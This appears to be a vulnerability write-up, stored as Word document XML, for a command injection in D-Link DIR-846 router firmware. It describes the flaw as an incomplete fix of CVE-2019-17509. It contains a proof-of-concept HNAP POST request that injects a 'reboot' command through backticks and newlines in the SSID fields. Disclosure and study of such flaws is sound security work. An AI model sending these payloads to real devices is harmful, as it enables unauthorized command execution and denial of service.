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dir-846commandinjection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DIR-846_Command_Injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="impact-equipment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact equipment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D-LINK DIR-846 (Rev A) ALL</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="22" w:name="firmware"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firmware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DIR846A1_FW100A43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-846</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="describe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Describe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D-Link Router DIR-846 DIR846A1_FW100A43.bin最新版固件中的HNAP1/control/SetMasterWLanSettings.php存在命令注入漏洞。攻击者可利用该漏洞通过ssid0或ssid1参数中的shell元字符使用"\n"或者反引号绕过从而执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="27" w:name="detail"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">此漏洞是由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-17509</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">未修补完善，可以在其基础上使用换行或者使用反引号进行绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2295017"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="image-20211226102113922" title="" id="25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1122610211392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image-20211226102113922</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="poc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /HNAP1/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0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Accept-Language: en-US,en;q=0.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate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SOAPACTION: "http://purenetworks.com/HNAP1/SetNetworkTomographySettings"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HNAP_AUTH: AB26D09C30FC07AF9FA05EF59B3B2558 1640421298429</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 284</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin: http://192.168.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: http://192.168.0.1/Diagnosis.html?t=1640421281425</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: uid=fN5PwZCT; PrivateKey=B2488589E39C47E4F8349060E88008DE; PHPSESSID=6209b08bddf630e68695800cd08e4203; sys_domain=dlinkrouter.com; timeout=2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"SetMasterWLanSettings":{"wl(0).(0)_enable":"1","wl(0).(0)_ssid":"`reboot`","wl(0).(0)_preshared_key":"aXJrZXJPZ2dNVEl6TkRVMk56Zz0=","wl(0).(0)_crypto":"aestkip","wl(1).(0)_enable":"1","wl(1).(0)_ssid":"\nreboot\n","wl(1).(0)_preshared_key":"aXJrZXJPZ2c=","wl(1).(0)_crypto":"none"}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="32" w:name="text"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TEXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">如下数据包将导致路由器重新启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5500427"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="image-20211226102955168" title="fig:" id="30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1122610295516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21" Target="http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-84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support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-8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2021-12-26T05:09:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-26T05:09:43Z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